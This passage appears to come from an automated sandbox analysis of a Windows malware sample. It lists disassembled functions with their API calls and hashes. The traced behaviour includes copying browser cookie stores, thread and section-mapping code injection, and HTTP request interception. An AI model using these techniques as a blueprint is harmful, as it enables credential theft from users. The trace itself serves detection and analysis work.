    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
